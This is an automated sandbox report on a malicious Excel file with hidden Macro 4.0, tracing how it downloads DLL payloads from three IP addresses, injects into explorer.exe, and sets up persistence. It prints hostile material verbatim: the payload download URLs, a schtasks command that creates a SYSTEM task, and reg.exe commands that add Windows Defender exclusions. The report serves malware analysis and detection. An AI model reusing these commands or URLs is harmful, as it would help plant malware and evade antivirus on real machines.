    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd2.red

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd2.red
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 12_2_100030B7 StartServiceCtrlDispatcherA,

    Hooking and other Techniques for Hiding and Protection:

    Overwrites code with unconditional jumps - possibly settings hooks in foreign process
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2124 base: DF102D value: E9 BA 4C 29 FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2988 base: DF102D value: E9 BA 4C 2F FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2544 base: DF102D value: E9 BA 4C 29 FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 284 base: DF102D value: E9 BA 4C 2F FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIADAP.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2088 | Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 840 | Thread sleep time: -100000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2692 | Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2904 | Thread sleep count: 71 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2536 | Thread sleep count: 52 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2936 | Thread sleep count: 63 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2936 | Thread sleep time: -104000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2116 | Thread sleep count: 50 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2428 | Thread sleep count: 99 > 30
    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2952 | Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2908 | Thread sleep count: 2670 > 30
    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2908 | Thread sleep count: 2578 > 30
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
    Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 2670
    Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 2578
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_000EAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 12_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_005E4495 or ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 12_2_001D4495 or ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00085A61 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    Maps a DLL or memory area into another process
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regions
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
    Allocates memory in foreign processes
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2124 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2124 base: DF102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2988 base: 80000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2988 base: DF102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2544 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2544 base: DF102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 284 base: 80000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 284 base: DF102D value: E9
    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match | File source: Compensation-2308017-09272021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp | Binary or memory string: !Progman
    Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000831C2 CreateNamedPipeA,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    (Columns are separated by "|"; a trailing number on a technique name is the counter the report attaches to that technique. The Remote Service Effects column has only three entries.)

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting2 | Windows Service3 | Extra Window Memory Injection1 | Disable or Modify Tools1 | Credential API Hooking1 | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Native API1 | Scheduled Task/Job1 | Windows Service3 | Scripting2 | LSASS Memory | File and Directory Discovery3 | Remote Desktop Protocol | Credential API Hooking1 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Exploitation for Client Execution32 | Logon Script (Windows) | Process Injection413 | Obfuscated Files or Information1 | Security Account Manager | System Information Discovery15 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | Command and Scripting Interpreter11 | Logon Script (Mac) | Scheduled Task/Job1 | File Deletion1 | NTDS | Security Software Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol21 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Scheduled Task/Job1 | Network Logon Script | Network Logon Script | Extra Window Memory Injection1 | LSA Secrets | Virtualization/Sandbox Evasion1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Service Execution2 | Rc.common | Rc.common | Masquerading131 | Cached Domain Credentials | Process Discovery3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Modify Registry1 | DCSync | Application Window Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection413 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

    Behavior Graph

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Behavior Graph ID: 491573 | Sample: Compensation-2308017-09272021.xls | Startdate: 27/09/2021 | Architecture: WINDOWS | Score: 100

    Signatures attached to the sample node:
    • Document exploit detected (drops PE files)
    • Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    • Sigma detected: Schedule system process
    • 7 other signatures

    Process tree (the graph's edges rendered as an indented list; numbers in brackets are the counters shown next to a process node, see legend):

    • EXCEL.EXE [194 38]
      • 190.14.37.178, 49167, 80 (OffshoreRacksSAPA, Panama)
      • 185.183.96.67, 49168, 80 (HSAE, Netherlands)
      • 185.250.148.213, 49169, 80 (FIRSTDC-ASRU, Russian Federation)
      • dropped: C:\Users\user\...\44466.7516903935[3].dat, PE32
      • dropped: C:\Users\user\...\44466.7516903935[2].dat, PE32
      • dropped: C:\Users\user\...\44466.7516903935[1].dat, PE32
      • signature: Document exploit detected (UrlDownloadToFile)
      • regsvr32.exe
        • regsvr32.exe
          • signature: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          • signature: Injects code into the Windows Explorer (explorer.exe)
          • signature: Writes to foreign memory regions
          • explorer.exe [8 1]
            • signature: Uses cmd line tools excessively to alter registry or file data
            • signature: Drops PE files to the user root directory
            • signature: Uses schtasks.exe or at.exe to add and modify task schedules
            • schtasks.exe
      • regsvr32.exe
        • regsvr32.exe
          • signature: Allocates memory in foreign processes
          • signature: Maps a DLL or memory area into another process
          • explorer.exe
            • dropped: C:\Users\user\Drezd1.red, PE32
          • WMIADAP.exe [4]
      • regsvr32.exe
        • regsvr32.exe
          • explorer.exe
            • dropped: C:\Users\user\Drezd2.red, PE32
    • regsvr32.exe
      • regsvr32.exe
        • signature: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
        • signature: Injects code into the Windows Explorer (explorer.exe)
        • signature: Writes to foreign memory regions
        • 2 other signatures
        • explorer.exe [8 1]
          • dropped: C:\Users\user\Drezd.red, PE32
          • signature: Uses cmd line tools excessively to alter registry or file data
          • reg.exe [1]
          • reg.exe [1]
    • regsvr32.exe
      • regsvr32.exe

    Screenshots


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    Compensation-2308017-09272021.xls | 0% | ReversingLabs

    Dropped Files

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat | 100% | Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat | 100% | Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat | 100% | Joe Sandbox ML
    C:\Users\user\Drezd.red | 9% | ReversingLabs
    C:\Users\user\Drezd1.red | 9% | ReversingLabs
    C:\Users\user\Drezd2.red | 9% | ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    http://www.%s.comPA | 0% | URL Reputation | safe
    http://185.250.148.213/44466.7516903935.dat | 0% | Avira URL Cloud | safe
    http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
    http://185.183.96.67/44466.7516903935.dat | 0% | Avira URL Cloud | safe
    http://190.14.37.178/44466.7516903935.dat | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://185.250.148.213/44466.7516903935.dat | false | Avira URL Cloud: safe | unknown
    http://185.183.96.67/44466.7516903935.dat | false | Avira URL Cloud: safe | unknown
    http://190.14.37.178/44466.7516903935.dat | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.%s.comPA | regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.449319415.0000000002170000.00000002.00020000.sdmp | false | URL Reputation: safe | low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp | false | | high
    http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.441359204.0000000001DB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.439921319.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.451658912.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.448814500.0000000001C80000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

      Contacted IPs


      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      185.183.96.67 | unknown | Netherlands | 60117 | HSAE | false
      190.14.37.178 | unknown | Panama | 52469 | OffshoreRacksSAPA | false
      185.250.148.213 | unknown | Russian Federation | 48430 | FIRSTDC-ASRU | false

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:491573
      Start date:27.09.2021
      Start time:18:01:57
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 13m 55s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Compensation-2308017-09272021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of new started processes analysed:25
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@34/15@0/3
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 23.5% (good quality ratio 22.1%)
      • Quality average: 75.9%
      • Quality standard deviation: 28.1%
      HCA Information:
      • Successful, ratio: 85%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
      • TCP Packets have been reduced to 100
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      Time | Type | Description
      18:02:32 | API Interceptor | 58x Sleep call for process: regsvr32.exe modified
      18:02:34 | API Interceptor | 867x Sleep call for process: explorer.exe modified
      18:02:37 | Task Scheduler | Run new task: icvxxob path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"
      18:02:37 | API Interceptor | 2x Sleep call for process: schtasks.exe modified
      18:03:20 | API Interceptor | 232x Sleep call for process: WMIADAP.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528531099414568
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M6:vs6Xpq0H3Jhds/9+qC/zfTPLo
      MD5:2B6A4F376AFCF41EAA504F31C09742EA
      SHA1:1689F9D6E949AC730E315CFFEFBB6300C3CCA262
      SHA-256:5302838FB3AD0C5EA363196FB161ECA41E392884E96590E7C231EDB2AE7B1EB7
      SHA-512:E14E146CD877D60BAEFD736F05616D54109FA3EA251DA8F1C8B55572A223B2328941233FCAD93DB9BF407F46D36223FF659FC27FD8BFC19EE5FEC66D84E6CB16
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528531099414568
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M6:vs6Xpq0H3Jhds/9+qC/zfTPLo
      MD5:2B6A4F376AFCF41EAA504F31C09742EA
      SHA1:1689F9D6E949AC730E315CFFEFBB6300C3CCA262
      SHA-256:5302838FB3AD0C5EA363196FB161ECA41E392884E96590E7C231EDB2AE7B1EB7
      SHA-512:E14E146CD877D60BAEFD736F05616D54109FA3EA251DA8F1C8B55572A223B2328941233FCAD93DB9BF407F46D36223FF659FC27FD8BFC19EE5FEC66D84E6CB16
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528531099414568
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M6:vs6Xpq0H3Jhds/9+qC/zfTPLo
      MD5:2B6A4F376AFCF41EAA504F31C09742EA
      SHA1:1689F9D6E949AC730E315CFFEFBB6300C3CCA262
      SHA-256:5302838FB3AD0C5EA363196FB161ECA41E392884E96590E7C231EDB2AE7B1EB7
      SHA-512:E14E146CD877D60BAEFD736F05616D54109FA3EA251DA8F1C8B55572A223B2328941233FCAD93DB9BF407F46D36223FF659FC27FD8BFC19EE5FEC66D84E6CB16
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:unknown
